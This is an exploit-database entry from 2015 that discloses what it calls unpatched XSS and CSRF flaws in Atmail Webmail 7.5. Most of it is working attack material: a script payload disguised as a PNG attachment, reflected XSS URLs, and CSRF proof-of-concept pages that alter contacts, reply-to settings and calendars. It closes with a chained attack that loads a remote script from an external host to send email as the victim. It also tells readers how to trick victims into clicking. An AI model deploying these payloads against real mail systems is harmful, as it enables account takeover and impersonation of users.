Atmail Webmail 7.5 - Multiple Vulnerabilities

2015-02-07T00:00:00
ID 1337DAY-ID-23253
Type zdt
Reporter Smash_
Modified 2015-02-07T00:00:00

Description

Atmail is a commercial Linux messaging platform provider, the company develops webmail service known as Atmail Webmail. Latest version of Atmail, including desktop and mobile versions, suffers on multiple XSS and CSRF vulnerabilities, which may lead to account takeover. Attacker is able to inject stored XSS into received emails, change account settings or even send email as a victim. 0day.

                                        
                                            #Title: Atmail Webmail => 7.5 - Multiple Vulnerabilities
#Date: 02.07.2014
#Vendor: atmail.com
#Version: => 7.5.0 (Latest ATM)
#Contact: smash[at]devilteam.pl
#Author: Smash_
#PoC: demo.atmail.com


 - Agenda

Atmail is a commercial Linux messaging platform provider, the company develops webmail service known as Atmail Webmail. Latest version of Atmail, including desktop and mobile versions, suffers on multiple XSS and CSRF vulnerabilities, which may lead to account takeover.

Attacker is able to inject stored XSS into received emails, change account settings or even send email as a victim. Examples are shown below.

0day.


 - Vulns

 1/ Atmail Desktop & Atmail Mobile

 a) Stored XSS in Received email 

First vulnereability affects both versions of Atmail. It is able to inject stored XSS into user account via file upload, have a look:

[email protected]:~/Images$ cat xss.png
<script>alert(666)</script>

If you will send an email to victim with following attachment, it will be displayed in email, also attachment will be available under specific url, e.g:
https://demo.atmail.com/index.php/mail/viewmessage/getattachment/folder/INBOX/uniqueId/11/mimeType/aW1hZ2UvcG5n/filenameOriginal/73308fee066e5b1baa9ff7db85150b8b

Whenever user will click on attachment, for example to enlarge it, below http request will be executed:
GET /index.php/mail/viewmessage/getattachment/folder/INBOX/uniqueId/11/mimeType/aW1hZ2UvcG5n/filenameOriginal/73308fee066e5b1baa9ff7db85150b8b HTTP/1.1
Host: demo.atmail.com

Response:
HTTP/1.1 200 OK
Expires: 0
Cache-Control: must-revalidate
Pragma: public
Content-Description: File Transfer
Content-Disposition: inline; filename="xss.png"
Content-Length: 28
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: : application/octet-stream

<script>alert(666)</script>

...alert will be executed.

Just send crafted file to victim, and ask him to click on the image if it doesn't load 
correctly. You may also just send link to victim of uploaded image that include js.


 2/ Atmail Desktop 

 b) Reflected Self-XSS - File upload

Whenever name of uploaded file will consist of html/js payload, it will be executed while uploading (e.g. attachment of email). Attacker would need to induce user to upload crafted file.

Request:
POST /index.php/mail/webdav/upload/ HTTP/1.1
Host: demo.atmail.com
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------492652708397401070402240553
Content-Length: 6044

-----------------------------492652708397401070402240553
Content-Disposition: form-data; name="atmailCSRF"

a0xSb0lVcTZKN2lBRUxqakxRMDlBMzVSQXBpM1ErYzZrUTFGYjNoWDJkRjJLbU9pOk1USXhORE14TnpBME1BPT0=
-----------------------------492652708397401070402240553
Content-Disposition: form-data; name="folder"

Documents
-----------------------------492652708397401070402240553
Content-Disposition: form-data; name="newAttachmentStorage"; filename="<img src=# onerror=alert(123)>.png"
Content-Type: image/png

(...)
-----------------------------492652708397401070402240553--


Response:
HTTP/1.1 200 OK
Date: Thu, 05 Feb 2015 21:04:56 GMT

<img src=# onerror=alert(123)>.png


 c) Reflected XSS - Calendar Popup

It is a must to provide valid values of contextId, id and relative_href. 

Request:
https://demo.atmail.com/index.php/mail/calendar/popup/?contextId=%23calpop%27%29;%22%20onmouseover=alert%28666%29%20x=%22&id=e7a7b4d9-6840-42b6-afe6-01e4e0f08f55&relative_href=%2Fcalendars%2Fdemo_glj0%40demo.atmail.com%2Fcalendar%2Fpopup=true&componentType=VTODO&addOrEdit=edit

Response:
(...)
    <ul id="EditEvent-Btns">
        <li onclick="deleteEvent('25f57d30-ad76-415a-a16b-61af8840d579', 'VTODO');"><a href="#"><span><strong>Delete</strong></span></a></li>        <li class="EventSave" onclick="saveAndExit('#calpop');" onmouseover=alert(666) x="', false, 'VTODO', 'edit');"><a href="#"><span><strong>Save</strong></span></a></li>
        <li class="EventCancel" onclick="saveAndExit('#calpop');" onmouseover=alert(666) x="', true);"><a href="#"><span><strong>Cancel</strong></span></a></li>
    </ul>
(...)


 d) CSRF - Add Contact

 It is able to bypass several CSRF protection tokens while adding a contact, using 'import' function.

 Request looks like this:
 -----------------------------1321143121674483220575199094
Content-Disposition: form-data; name="GroupID"

0
-----------------------------1321143121674483220575199094
Content-Disposition: form-data; name="ImportFile"; filename="woot.vcf"
Content-Type: text/vcard

BEGIN:VCARD
VERSION:3.0
FN:wootwoot
N:uh;oh;;;
ORG:;
EMAIL;type=INTERNET;type=HOME;type=pref:[email protected]
END:VCARD

-----------------------------1321143121674483220575199094--

...while regular 'add user' request looks like:
atmailCSRF=VXVFS2hvMmtScTBJbXdod2F2VGo1cnNIOUN1RHp6SWtZWktBK25lNlcvRVRYMlRtOk5ERTFOelV3TkRJNQ%3D%3D&contact%5Bid%5D=&contact%5BserverID%5D=&contact%5BNewContact%5D=1&contact%5BGroupID%5D=&contact%5BFavourite%5D=0&contact%5BUserFirstName%5D=&contact%5BUserLastName%5D=&contact%5BnumberFieldName%5D%5B%5D=UserHomePhone&contact%5BnumberValue%5D%5B%5D=&contact%5BemailFieldName%5D%5B%5D=UserEmail&contact%5BemailValue%5D%5B%5D=&contact%5BUserHomeAddress%5D=&contact%5BUserHomeCity%5D=&contact%5BUserHomeState%5D=&contact%5BUserHomeZip%5D=&contact%5BUserHomeCountry%5D=&contact%5BUserWorkAddress%5D=&contact%5BUserWorkCity%5D=&contact%5BUserWorkState%5D=&contact%5BUserWorkZip%5D=&contact%5BUserWorkCountry%5D=&contact%5BUserWorkCompany%5D=&contact%5BUserTitle%5D=&contact%5BUserMiddleName%5D=&contact%5BUserDOB%5D=&contact%5BUserURL%5D=&contact%5BUserWorkTitle%5D=&contact%5BUserWorkDept%5D=&contact%5BUserInfo%5D=&atmailCSRF=ZWdraXZ1WE1iclVRZ3pDWmcreWJEc00vSEVPNzUxcGNucXFvZ2g5Q1k1azRaQXVLOk1URTJOemc1TnpZME1BPT0%3D

PoC:
 <script>
function submitRequest()
{
  var xhr = new XMLHttpRequest();
  xhr.open("POST", "https://demo.atmail.com/index.php/mail/contacts/import", true);
  xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
  xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
  xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------11955679271300344735628552430");
  xhr.withCredentials = true;
  var body = "-----------------------------11955679271300344735628552430\r\n" + 
 "Content-Disposition: form-data; name=\"GroupID\"\r\n" + 
 "\r\n" + 
 "0\r\n" + 
 "-----------------------------11955679271300344735628552430\r\n" + 
 "Content-Disposition: form-data; name=\"ImportFile\"; filename=\"woot.vcf\"\r\n" + 
 "Content-Type: text/vcard\r\n" + 
 "\r\n" + 
 "BEGIN:VCARD\r\n" + 
 "VERSION:3.0\r\n" + 
 "FN:sup.\r\n" + 
 "N:\r\n" + 
 "ORG:;\r\n" + 
 "EMAIL;type=INTERNET;type=HOME;type=pref:[email protected]\r\n" + 
 "END:VCARD\r\n" + 
 "\r\n" + 
 "-----------------------------11955679271300344735628552430--\r\n";
  var aBody = new Uint8Array(body.length);
  for (var i = 0; i < aBody.length; i++)
 aBody[i] = body.charCodeAt(i); 
  xhr.send(new Blob([aBody]));
}

submitRequest();
 </script>


 e) CSRF - Add Photo to Contact

PoC:
 <script>
function submitRequest()
{
  var xhr = new XMLHttpRequest();
  xhr.open("POST", "https://demo.atmail.com/index.php/mail/contacts/addphoto", true);
  xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
  xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
  xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------7991427614816100631567933826");
  xhr.withCredentials = true;
  var body = "-----------------------------7991427614816100631567933826\r\n" + 
 "Content-Disposition: form-data; name=\"id\"\r\n" + 
 "\r\n" + 
 "2305177\r\n" + 
 "-----------------------------7991427614816100631567933826\r\n" + 
 "Content-Disposition: form-data; name=\"GroupID\"\r\n" + 
 "\r\n" + 
 "\r\n" + 
 "-----------------------------7991427614816100631567933826\r\n" + 
 "Content-Disposition: form-data; name=\"OriginImg\"\r\n" + 
 "\r\n" + 
 "https://demo.atmail.com/index.php/mail/contacts/viewphoto/id/2305177/699999193\r\n" + 
 "-----------------------------7991427614816100631567933826\r\n" + 
 "Content-Disposition: form-data; name=\"UserPhoto\"; filename=\"woot\x3e.png\"\r\n" + 
 "Content-Type: image/png\r\n" + 
 "\r\n" + 
 "abc\r\n" + 
 "-----------------------------7991427614816100631567933826--\r\n";
  var aBody = new Uint8Array(body.length);
  for (var i = 0; i < aBody.length; i++)
 aBody[i] = body.charCodeAt(i); 
  xhr.send(new Blob([aBody]));
}

submitRequest();
 </script>



2/ Atmail Mobile

 f) CSRF - Change account settings

It is able to change values such as display name and reply-to.

PoC:
<html>
  <body>
    <form action="https://demo.atmail.com/index.php/api/settings/webmailsave" method="POST">
      <input type="hidden" name="fields[RealName]" value="lelz" />
      <input type="hidden" name="fields[ReplyTo]" value="madhax0r@uh.oh" />
      <input type="hidden" name="fields[DeleteTrashOnLogout]" value="0" />
      <input type="hidden" name="fields[enableAccessibility]" value="0" />
      <input type="hidden" name="fields[MsgNum]" value="25" />
      <input type="hidden" name="fields[DateDisplay]" value="1" />
      <input type="hidden" name="fields[TimeZone]" value="America/Los_Angeles" />
      <input type="submit" value="Go" />
    </form>
  </body>
</html>

Other PoC:
<script>
  function submitRequest()
  {
var xhr = new XMLHttpRequest();
xhr.open("POST", "https://demo.atmail.com/index.php/api/settings/webmailsave", true);
xhr.setRequestHeader("Accept", "application/json, text/javascript, */*; q=0.01");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
xhr.withCredentials = true;
var body = "fields%5BRealName%5D=woot&fields%5BReplyTo%5D=madhax0r%40uh.oh&fields%5BDeleteTrashOnLogout%5D=0&fields%5BenableAccessibility%5D=0&fields%5BMsgNum%5D=25&fields%5BDateDisplay%5D=1&fields%5BTimeZone%5D=America%2FLos_Angeles";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
  aBody[i] = body.charCodeAt(i); 
xhr.send(new Blob([aBody]));
  }
  submitRequest();
</script>

 
 g) CSRF  - Add Event do Calendar

You may find more CSRF vulns in mobile version of Atmail, especially using XSS so you can bypass some CSRF restrictions.

PoC:
<html>
  <body>
    <form action="https://demo.atmail.com/index.php/api/calendar/add" method="POST">
      <input type="hidden" name="Msg_Type" value="General" />
      <input type="hidden" name="Msg_Title" value="woot" />
      <input type="hidden" name="Location" value="hell" />
      <input type="hidden" name="startDate" value="1423242720" />
      <input type="hidden" name="endDate" value="1423244520" />
      <input type="hidden" name="Msg_Text" value="sup" />
      <input type="hidden" name="relative_href" value="/calendars/demo_glj0%40demo.atmail.com/calendar/" />
      <input type="submit" value="Go" />
    </form>
  </body>
</html>


 h) CSRF via XSS - Send email 

In Desktop Version af atmail, sending an email is secured by two CSRF tokens:
atmailCSRF=Ym0wMk5JY0Z6Z1hyT1dyUFFHR3hOOVhteHFFYWZ5ZTV5WVl1TE9zd0FEL2QwQWdQOk56a3dNVFl5TVRZMg%3D%3D&tabId=viewmessageTab5&composeID=uidb1e37b05c6&relatedMessageFolder=&relatedMessageUIDs=&relatedMessageMessageId=&relatedMessageResponseType=&relatedDraftUID=&readReceiptRequested=false&emailTo=&emailSubject=&emailCc=&emailBcc=&emailBodyHtml=%3Cbr%3E&atmailCSRF=Ym0wMk5JY0Z6Z1hyT1dyUFFHR3hOOVhteHFFYWZ5ZTV5WVl1TE9zd0FEL2QwQWdQOk56a3dNVFl5TVRZMg%3D%3D

In a Mobile version, it isn't secured by tokens at all:
POST /index.php/mobile/index/send HTTP/1.1
Host: demo.atmail.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-CSRF: 1
X-Requested-With: XMLHttpRequest
Referer: https://demo.atmail.com/index.php/mobile
Content-Length: 89
Cookie: __utma=69257664.594442521.1423085360.1423085360.1423085360.1; __utmz=69257664.1423085360.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); atmail6=ivsjdsdcjjovf67ufaus2f8nb0
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

emailTo=demo_ork8%40demo.atmail.com&emailCc=&emailBcc=&emailSubject=sup&emailBodyText=abc

...anyway, you can't craft CSRF request because of custom X-CSRF header.

It is able to bypass this restriction, using XSS vulnerability on the same domain that atmail is implemented. 

In example shown below, i'm using mentioned stored XSS in received email, to include external .js and send an email as a victim.

#1 - So, user is requesting XSS payload:
GET /index.php/mail/viewmessage/getattachment/folder/INBOX/uniqueId/12/mimeType/aW1hZ2UvcG5n/filenameOriginal/63d53a11efa5b36ca853b6471cc540ff/attachmentId/3 HTTP/1.1

#1 - Response:
HTTP/1.1 200 OK
Expires: 0
Cache-Control: must-revalidate
Pragma: public
Content-Description: File Transfer
Content-Disposition: inline; filename="xss1.png"
Content-Length: 88
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: : application/octet-stream

 <script src="https://raw.githubusercontent.com/Smaash/random/master/hmm.js"></script> 

#2 - Request (external js inclusion):
GET /Smaash/random/master/hmm.js HTTP/1.1
Host: raw.githubusercontent.com

#2 - Response:
HTTP/1.1 200 OK
Vary: Authorization,Accept-Encoding
Expires: Fri, 06 Feb 2015 23:16:12 GMT
Source-Age: 12
Keep-Alive: timeout=10, max=50
Connection: Keep-Alive

var xhr = new XMLHttpRequest();
xhr.open("POST", "https://demo.atmail.com/index.php/mobile/index/send", true);
xhr.setRequestHeader("Accept", "application/json, text/javascript, */*; q=0.01");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("X-CSRF", 1);
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
xhr.withCredentials = true;
var body = "[email protected]&emailCc=&emailBcc=&emailSubject=abc&emailBodyText=abc";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
  aBody[i] = body.charCodeAt(i); 
xhr.send(new Blob([aBody]));

#3 - Request:
POST /index.php/mobile/index/send HTTP/1.1
Host: demo.atmail.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-CSRF: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: https://demo.atmail.com/index.php/mail/viewmessage/getattachment/folder/INBOX/uniqueId/12/mimeType/aW1hZ2UvcG5n/filenameOriginal/63d53a11efa5b36ca853b6471cc540ff/attachmentId/3
Content-Length: 80
Cookie: __utma=69257664.594442521.1423085360.1423085360.1423085360.1; __utmz=69257664.1423085360.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); atmail6=ivsjdsdcjjovf67ufaus2f8nb0
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

[email protected]&emailCc=&emailBcc=&emailSubject=abc&emailBodyText=abc

Email just have been send correctly.


eof.

#  0day.today [2018-03-13]  #